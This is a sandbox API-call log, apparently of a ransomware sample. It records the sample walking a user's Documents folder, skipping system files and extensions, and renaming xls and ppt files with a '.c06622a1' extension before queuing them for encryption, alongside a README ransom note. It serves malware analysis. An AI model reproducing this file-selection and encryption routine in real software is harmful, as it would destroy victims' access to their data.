[0148.789] wcslen (_String="drv") returned 0x3 [0148.789] _wcsicmp (_Str1="exe", _Str2="xls") returned -19 [0148.789] wcslen (_String="exe") returned 0x3 [0148.789] _wcsicmp (_Str1="hlp", _Str2="xls") returned -16 [0148.789] wcslen (_String="hlp") returned 0x3 [0148.789] _wcsicmp (_Str1="icl", _Str2="xls") returned -15 [0148.789] wcslen (_String="icl") returned 0x3 [0148.789] _wcsicmp (_Str1="icns", _Str2="xls") returned -15 [0148.789] wcslen (_String="icns") returned 0x4 [0148.789] _wcsicmp (_Str1="ico", _Str2="xls") returned -15 [0148.789] wcslen (_String="ico") returned 0x3 [0148.789] _wcsicmp (_Str1="ics", _Str2="xls") returned -15 [0148.789] wcslen (_String="ics") returned 0x3 [0148.789] _wcsicmp (_Str1="idx", _Str2="xls") returned -15 [0148.789] wcslen (_String="idx") returned 0x3 [0148.789] _wcsicmp (_Str1="ldf", _Str2="xls") returned -12 [0148.789] wcslen (_String="ldf") returned 0x3 [0148.789] _wcsicmp (_Str1="lnk", _Str2="xls") returned -12 [0148.789] wcslen (_String="lnk") returned 0x3 [0148.789] _wcsicmp (_Str1="mod", _Str2="xls") returned -11 [0148.789] wcslen (_String="mod") returned 0x3 [0148.789] _wcsicmp (_Str1="mpa", _Str2="xls") returned -11 [0148.789] wcslen (_String="mpa") returned 0x3 [0148.789] _wcsicmp (_Str1="msc", _Str2="xls") returned -11 [0148.789] wcslen (_String="msc") returned 0x3 [0148.789] _wcsicmp (_Str1="msp", _Str2="xls") returned -11 [0148.789] wcslen (_String="msp") returned 0x3 [0148.789] _wcsicmp (_Str1="msstyles", _Str2="xls") returned -11 [0148.789] wcslen (_String="msstyles") returned 0x8 [0148.789] _wcsicmp (_Str1="msu", _Str2="xls") returned -11 [0148.789] wcslen (_String="msu") returned 0x3 [0148.789] _wcsicmp (_Str1="nls", _Str2="xls") returned -10 [0148.789] wcslen (_String="nls") returned 0x3 [0148.789] _wcsicmp (_Str1="nomedia", _Str2="xls") returned -10 [0148.789] wcslen (_String="nomedia") returned 0x7 [0148.789] _wcsicmp (_Str1="ocx", _Str2="xls") returned -9 [0148.789] wcslen (_String="ocx") returned 0x3 [0148.790] _wcsicmp (_Str1="prf", _Str2="xls") returned -8 [0148.790] wcslen (_String="prf") returned 0x3 [0148.790] _wcsicmp (_Str1="ps1", _Str2="xls") returned -8 [0148.790] wcslen (_String="ps1") returned 0x3 [0148.790] _wcsicmp (_Str1="rom", _Str2="xls") returned -6 [0148.790] wcslen (_String="rom") returned 0x3 [0148.790] _wcsicmp (_Str1="rtp", _Str2="xls") returned -6 [0148.790] wcslen (_String="rtp") returned 0x3 [0148.790] _wcsicmp (_Str1="scr", _Str2="xls") returned -5 [0148.790] wcslen (_String="scr") returned 0x3 [0148.790] _wcsicmp (_Str1="shs", _Str2="xls") returned -5 [0148.790] wcslen (_String="shs") returned 0x3 [0148.790] _wcsicmp (_Str1="spl", _Str2="xls") returned -5 [0148.790] wcslen (_String="spl") returned 0x3 [0148.790] _wcsicmp (_Str1="sys", _Str2="xls") returned -5 [0148.790] wcslen (_String="sys") returned 0x3 [0148.790] _wcsicmp (_Str1="theme", _Str2="xls") returned -4 [0148.790] wcslen (_String="theme") returned 0x5 [0148.790] _wcsicmp (_Str1="themepack", _Str2="xls") returned -4 [0148.790] wcslen (_String="themepack") returned 0x9 [0148.790] _wcsicmp (_Str1="wpx", _Str2="xls") returned -1 [0148.790] wcslen (_String="wpx") returned 0x3 [0148.790] _wcsicmp (_Str1="lock", _Str2="xls") returned -12 [0148.790] wcslen (_String="lock") returned 0x4 [0148.790] _wcsicmp (_Str1="key", _Str2="xls") returned -13 [0148.790] wcslen (_String="key") returned 0x3 [0148.790] _wcsicmp (_Str1="hta", _Str2="xls") returned -16 [0148.790] wcslen (_String="hta") returned 0x3 [0148.790] _wcsicmp (_Str1="msi", _Str2="xls") returned -11 [0148.790] wcslen (_String="msi") returned 0x3 [0148.791] _wcsicmp (_Str1="pdb", _Str2="xls") returned -8 [0148.791] wcslen (_String="pdb") returned 0x3 [0148.791] _wcsicmp (_Str1="sql", _Str2="xls") returned -5 [0148.791] wcslen (_String="sql") returned 0x3 [0148.791] _wcsicmp (_Str1="sqlite", _Str2="xls") returned -5 [0148.791] wcslen (_String="sqlite") returned 0x6 [0148.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w")) returned 0x10 [0148.791] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.791] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" [0148.791] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w") returned 0x3a [0148.791] wcscpy (in: _Dest=0x4500106, _Source="lcfPkoCr.xls" | out: _Dest="lcfPkoCr.xls") returned="lcfPkoCr.xls" [0148.791] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\lcfPkoCr.xls", dwFileAttributes=0x80) returned 1 [0148.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\lcfPkoCr.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\lcfpkocr.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x674 [0148.792] SetFilePointerEx (in: hFile=0x674, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.792] ReadFile (in: hFile=0x674, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0148.792] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x5136e090 [0148.792] RtlComputeCrc32 (PartialCrc=0xe090, Buffer=0x3fe8f4, Length=0x80) returned 0xbdd618ba [0148.792] RtlComputeCrc32 (PartialCrc=0x18ba, Buffer=0x3fe8f4, Length=0x80) returned 0x1ce8bbab [0148.792] RtlComputeCrc32 (PartialCrc=0xbbab, Buffer=0x3fe8f4, Length=0x80) returned 0x903c4dda [0148.792] RtlComputeCrc32 (PartialCrc=0x4dda, Buffer=0x3fe8f4, Length=0x80) returned 0x1f4cea04 [0148.793] CloseHandle (hObject=0x674) returned 1 [0148.793] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.793] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\lcfPkoCr.xls" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\lcfPkoCr.xls") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\lcfPkoCr.xls" [0148.793] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\lcfPkoCr.xls") returned 0x47 [0148.793] wcscpy (in: _Dest=0x4510126, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.793] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\lcfPkoCr.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\lcfpkocr.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\lcfPkoCr.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\lcfpkocr.xls.c06622a1"), dwFlags=0x8) returned 1 [0148.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\lcfPkoCr.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\lcfpkocr.xls.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x674 [0148.795] CreateIoCompletionPort (FileHandle=0x674, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.795] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0148.800] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3d200219 [0148.800] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3fb04f72 [0148.800] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54746484 [0148.800] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1af38897 [0148.800] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x60545192 [0148.800] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x39ed63f2 [0148.800] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x8295643 [0148.800] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x764d1ed0 [0148.803] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0xedaa42f [0148.803] RtlComputeCrc32 (PartialCrc=0xa42f, Buffer=0x4280094, Length=0x80) returned 0x670236db [0148.803] RtlComputeCrc32 (PartialCrc=0x36db, Buffer=0x4280094, Length=0x80) returned 0xfac8b9aa [0148.803] RtlComputeCrc32 (PartialCrc=0xb9aa, Buffer=0x4280094, Length=0x80) returned 0x27566de2 [0148.803] RtlComputeCrc32 (PartialCrc=0x6de2, Buffer=0x4280094, Length=0x80) returned 0x6ed86481 [0148.803] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0148.803] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.803] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.803] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd744fc20, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd744fc20, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7475d80, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0148.803] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0148.803] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6d25b30, ftCreationTime.dwHighDateTime=0x1d5e197, ftLastAccessTime.dwLowDateTime=0x67e044b0, ftLastAccessTime.dwHighDateTime=0x1d5deb7, ftLastWriteTime.dwLowDateTime=0x67e044b0, ftLastWriteTime.dwHighDateTime=0x1d5deb7, nFileSizeHigh=0x0, nFileSizeLow=0x175f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ySiHIadC6Ow5.ppt", cAlternateFileName="YSIHIA~1.PPT")) returned 1 [0148.803] _wcsicmp (_Str1="ySiHIadC6Ow5.ppt", _Str2="README.c06622a1.TXT") returned 7 [0148.804] wcsstr (_Str="ySiHIadC6Ow5.ppt", _SubStr="README") returned 0x0 [0148.804] _wcsicmp (_Str1="autorun.inf", _Str2="ySiHIadC6Ow5.ppt") returned -24 [0148.804] wcslen (_String="autorun.inf") returned 0xb [0148.804] _wcsicmp (_Str1="boot.ini", _Str2="ySiHIadC6Ow5.ppt") returned -23 [0148.804] wcslen (_String="boot.ini") returned 0x8 [0148.804] _wcsicmp (_Str1="bootfont.bin", _Str2="ySiHIadC6Ow5.ppt") returned -23 [0148.804] wcslen (_String="bootfont.bin") returned 0xc [0148.804] _wcsicmp (_Str1="bootsect.bak", _Str2="ySiHIadC6Ow5.ppt") returned -23 [0148.804] wcslen (_String="bootsect.bak") returned 0xc [0148.804] _wcsicmp (_Str1="desktop.ini", _Str2="ySiHIadC6Ow5.ppt") returned -21 [0148.804] wcslen (_String="desktop.ini") returned 0xb [0148.804] _wcsicmp (_Str1="iconcache.db", _Str2="ySiHIadC6Ow5.ppt") returned -16 [0148.804] wcslen (_String="iconcache.db") returned 0xc [0148.804] _wcsicmp (_Str1="ntldr", _Str2="ySiHIadC6Ow5.ppt") returned -11 [0148.804] wcslen (_String="ntldr") returned 0x5 [0148.804] _wcsicmp (_Str1="ntuser.dat", _Str2="ySiHIadC6Ow5.ppt") returned -11 [0148.804] wcslen (_String="ntuser.dat") returned 0xa [0148.804] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ySiHIadC6Ow5.ppt") returned -11 [0148.804] wcslen (_String="ntuser.dat.log") returned 0xe [0148.804] _wcsicmp (_Str1="ntuser.ini", _Str2="ySiHIadC6Ow5.ppt") returned -11 [0148.804] wcslen (_String="ntuser.ini") returned 0xa [0148.804] _wcsicmp (_Str1="thumbs.db", _Str2="ySiHIadC6Ow5.ppt") returned -5 [0148.804] wcslen (_String="thumbs.db") returned 0x9 [0148.804] _wcsicmp (_Str1="386", _Str2="ppt") returned -61 [0148.804] wcslen (_String="386") returned 0x3 [0148.804] _wcsicmp (_Str1="adv", _Str2="ppt") returned -15 [0148.804] wcslen (_String="adv") returned 0x3 [0148.804] _wcsicmp (_Str1="ani", _Str2="ppt") returned -15 [0148.804] wcslen (_String="ani") returned 0x3 [0148.804] _wcsicmp (_Str1="bat", _Str2="ppt") returned -14 [0148.804] wcslen (_String="bat") returned 0x3 [0148.804] _wcsicmp (_Str1="bin", _Str2="ppt") returned -14 [0148.804] wcslen (_String="bin") returned 0x3 [0148.804] _wcsicmp (_Str1="cab", _Str2="ppt") returned -13 [0148.804] wcslen (_String="cab") returned 0x3 [0148.804] _wcsicmp (_Str1="cmd", _Str2="ppt") returned -13 [0148.805] wcslen (_String="cmd") returned 0x3 [0148.805] _wcsicmp (_Str1="com", _Str2="ppt") returned -13 [0148.805] wcslen (_String="com") returned 0x3 [0148.805] _wcsicmp (_Str1="cpl", _Str2="ppt") returned -13 [0148.805] wcslen (_String="cpl") returned 0x3 [0148.805] _wcsicmp (_Str1="cur", _Str2="ppt") returned -13 [0148.805] wcslen (_String="cur") returned 0x3 [0148.805] _wcsicmp (_Str1="deskthemepack", _Str2="ppt") returned -12 [0148.805] wcslen (_String="deskthemepack") returned 0xd [0148.805] _wcsicmp (_Str1="diagcab", _Str2="ppt") returned -12 [0148.805] wcslen (_String="diagcab") returned 0x7 [0148.805] _wcsicmp (_Str1="diagcfg", _Str2="ppt") returned -12 [0148.805] wcslen (_String="diagcfg") returned 0x7 [0148.805] _wcsicmp (_Str1="diagpkg", _Str2="ppt") returned -12 [0148.805] wcslen (_String="diagpkg") returned 0x7 [0148.805] _wcsicmp (_Str1="dll", _Str2="ppt") returned -12 [0148.805] wcslen (_String="dll") returned 0x3 [0148.805] _wcsicmp (_Str1="drv", _Str2="ppt") returned -12 [0148.805] wcslen (_String="drv") returned 0x3 [0148.805] _wcsicmp (_Str1="exe", _Str2="ppt") returned -11 [0148.805] wcslen (_String="exe") returned 0x3 [0148.805] _wcsicmp (_Str1="hlp", _Str2="ppt") returned -8 [0148.805] wcslen (_String="hlp") returned 0x3 [0148.805] _wcsicmp (_Str1="icl", _Str2="ppt") returned -7 [0148.805] wcslen (_String="icl") returned 0x3 [0148.805] _wcsicmp (_Str1="icns", _Str2="ppt") returned -7 [0148.805] wcslen (_String="icns") returned 0x4 [0148.805] _wcsicmp (_Str1="ico", _Str2="ppt") returned -7 [0148.805] wcslen (_String="ico") returned 0x3 [0148.805] _wcsicmp (_Str1="ics", _Str2="ppt") returned -7 [0148.805] wcslen (_String="ics") returned 0x3 [0148.805] _wcsicmp (_Str1="idx", _Str2="ppt") returned -7 [0148.805] wcslen (_String="idx") returned 0x3 [0148.805] _wcsicmp (_Str1="ldf", _Str2="ppt") returned -4 [0148.805] wcslen (_String="ldf") returned 0x3 [0148.805] _wcsicmp (_Str1="lnk", _Str2="ppt") returned -4 [0148.805] wcslen (_String="lnk") returned 0x3 [0148.806] _wcsicmp (_Str1="mod", _Str2="ppt") returned -3 [0148.806] wcslen (_String="mod") returned 0x3 [0148.806] _wcsicmp (_Str1="mpa", _Str2="ppt") returned -3 [0148.806] wcslen (_String="mpa") returned 0x3 [0148.806] _wcsicmp (_Str1="msc", _Str2="ppt") returned -3 [0148.806] wcslen (_String="msc") returned 0x3 [0148.806] _wcsicmp (_Str1="msp", _Str2="ppt") returned -3 [0148.806] wcslen (_String="msp") returned 0x3 [0148.806] _wcsicmp (_Str1="msstyles", _Str2="ppt") returned -3 [0148.806] wcslen (_String="msstyles") returned 0x8 [0148.806] _wcsicmp (_Str1="msu", _Str2="ppt") returned -3 [0148.806] wcslen (_String="msu") returned 0x3 [0148.806] _wcsicmp (_Str1="nls", _Str2="ppt") returned -2 [0148.806] wcslen (_String="nls") returned 0x3 [0148.806] _wcsicmp (_Str1="nomedia", _Str2="ppt") returned -2 [0148.806] wcslen (_String="nomedia") returned 0x7 [0148.806] _wcsicmp (_Str1="ocx", _Str2="ppt") returned -1 [0148.806] wcslen (_String="ocx") returned 0x3 [0148.806] _wcsicmp (_Str1="prf", _Str2="ppt") returned 2 [0148.806] wcslen (_String="prf") returned 0x3 [0148.806] _wcsicmp (_Str1="ps1", _Str2="ppt") returned 3 [0148.806] wcslen (_String="ps1") returned 0x3 [0148.806] _wcsicmp (_Str1="rom", _Str2="ppt") returned 2 [0148.806] wcslen (_String="rom") returned 0x3 [0148.806] _wcsicmp (_Str1="rtp", _Str2="ppt") returned 2 [0148.806] wcslen (_String="rtp") returned 0x3 [0148.806] _wcsicmp (_Str1="scr", _Str2="ppt") returned 3 [0148.806] wcslen (_String="scr") returned 0x3 [0148.806] _wcsicmp (_Str1="shs", _Str2="ppt") returned 3 [0148.806] wcslen (_String="shs") returned 0x3 [0148.806] _wcsicmp (_Str1="spl", _Str2="ppt") returned 3 [0148.806] wcslen (_String="spl") returned 0x3 [0148.806] _wcsicmp (_Str1="sys", _Str2="ppt") returned 3 [0148.806] wcslen (_String="sys") returned 0x3 [0148.806] _wcsicmp (_Str1="theme", _Str2="ppt") returned 4 [0148.806] wcslen (_String="theme") returned 0x5 [0148.806] _wcsicmp (_Str1="themepack", _Str2="ppt") returned 4 [0148.806] wcslen (_String="themepack") returned 0x9 [0148.806] _wcsicmp (_Str1="wpx", _Str2="ppt") returned 7 [0148.807] wcslen (_String="wpx") returned 0x3 [0148.807] _wcsicmp (_Str1="lock", _Str2="ppt") returned -4 [0148.807] wcslen (_String="lock") returned 0x4 [0148.807] _wcsicmp (_Str1="key", _Str2="ppt") returned -5 [0148.807] wcslen (_String="key") returned 0x3 [0148.807] _wcsicmp (_Str1="hta", _Str2="ppt") returned -8 [0148.807] wcslen (_String="hta") returned 0x3 [0148.807] _wcsicmp (_Str1="msi", _Str2="ppt") returned -3 [0148.807] wcslen (_String="msi") returned 0x3 [0148.807] _wcsicmp (_Str1="pdb", _Str2="ppt") returned -12 [0148.807] wcslen (_String="pdb") returned 0x3 [0148.807] _wcsicmp (_Str1="sql", _Str2="ppt") returned 3 [0148.807] wcslen (_String="sql") returned 0x3 [0148.807] _wcsicmp (_Str1="sqlite", _Str2="ppt") returned 3 [0148.807] wcslen (_String="sqlite") returned 0x6 [0148.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w")) returned 0x10 [0148.807] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.807] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w" [0148.807] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w") returned 0x3a [0148.807] wcscpy (in: _Dest=0x4500106, _Source="ySiHIadC6Ow5.ppt" | out: _Dest="ySiHIadC6Ow5.ppt") returned="ySiHIadC6Ow5.ppt" [0148.807] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\ySiHIadC6Ow5.ppt", dwFileAttributes=0x80) returned 1 [0148.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\ySiHIadC6Ow5.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\ysihiadc6ow5.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0148.808] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.808] ReadFile (in: hFile=0x368, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0148.809] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x45366a29 [0148.809] RtlComputeCrc32 (PartialCrc=0x6a29, Buffer=0x3fe8f4, Length=0x80) returned 0x61f5fd48 [0148.809] RtlComputeCrc32 (PartialCrc=0xfd48, Buffer=0x3fe8f4, Length=0x80) returned 0xffc7deb5 [0148.809] RtlComputeCrc32 (PartialCrc=0xdeb5, Buffer=0x3fe8f4, Length=0x80) returned 0xe3a4bae [0148.809] RtlComputeCrc32 (PartialCrc=0x4bae, Buffer=0x3fe8f4, Length=0x80) returned 0x40ef2ec6 [0148.809] CloseHandle (hObject=0x368) returned 1 [0148.809] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.809] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\ySiHIadC6Ow5.ppt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\ySiHIadC6Ow5.ppt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\ySiHIadC6Ow5.ppt" [0148.809] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\ySiHIadC6Ow5.ppt") returned 0x4b [0148.809] wcscpy (in: _Dest=0x451012e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.809] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\ySiHIadC6Ow5.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\ysihiadc6ow5.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\ySiHIadC6Ow5.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\ysihiadc6ow5.ppt.c06622a1"), dwFlags=0x8) returned 1 [0148.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2tfUDBdxmf64_w\\ySiHIadC6Ow5.ppt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2tfudbdxmf64_w\\ysihiadc6ow5.ppt.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x368 [0148.811] CreateIoCompletionPort (FileHandle=0x368, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.811] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0148.817] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2ab9963c [0148.817] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a476614 [0148.817] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3d23068f [0148.817] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b16e0be [0148.817] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7585a12d [0148.817] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7e274dd6 [0148.817] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x591ead54 [0148.817] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x19269c98 [0148.820] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0x40d6f91f [0148.820] RtlComputeCrc32 (PartialCrc=0xf91f, Buffer=0x4670094, Length=0x80) returned 0x64abda1d [0148.820] RtlComputeCrc32 (PartialCrc=0xda1d, Buffer=0x4670094, Length=0x80) returned 0x6f33dc6b [0148.820] RtlComputeCrc32 (PartialCrc=0xdc6b, Buffer=0x4670094, Length=0x80) returned 0x76e88338 [0148.820] RtlComputeCrc32 (PartialCrc=0x8338, Buffer=0x4670094, Length=0x80) returned 0x7f17fc80 [0148.820] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0148.820] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.820] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.820] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.820] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0148.820] _wcsicmp (_Str1="backup", _Str2="2tfUDBdxmf64_w") returned 48 [0148.820] wcslen (_String="backup") returned 0x6 [0148.820] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.820] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.820] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53d6ed0, ftCreationTime.dwHighDateTime=0x1d5db26, ftLastAccessTime.dwLowDateTime=0x2db07360, ftLastAccessTime.dwHighDateTime=0x1d5df1a, ftLastWriteTime.dwLowDateTime=0x2db07360, ftLastWriteTime.dwHighDateTime=0x1d5df1a, nFileSizeHigh=0x0, nFileSizeLow=0x1889, dwReserved0=0x0, dwReserved1=0x0, 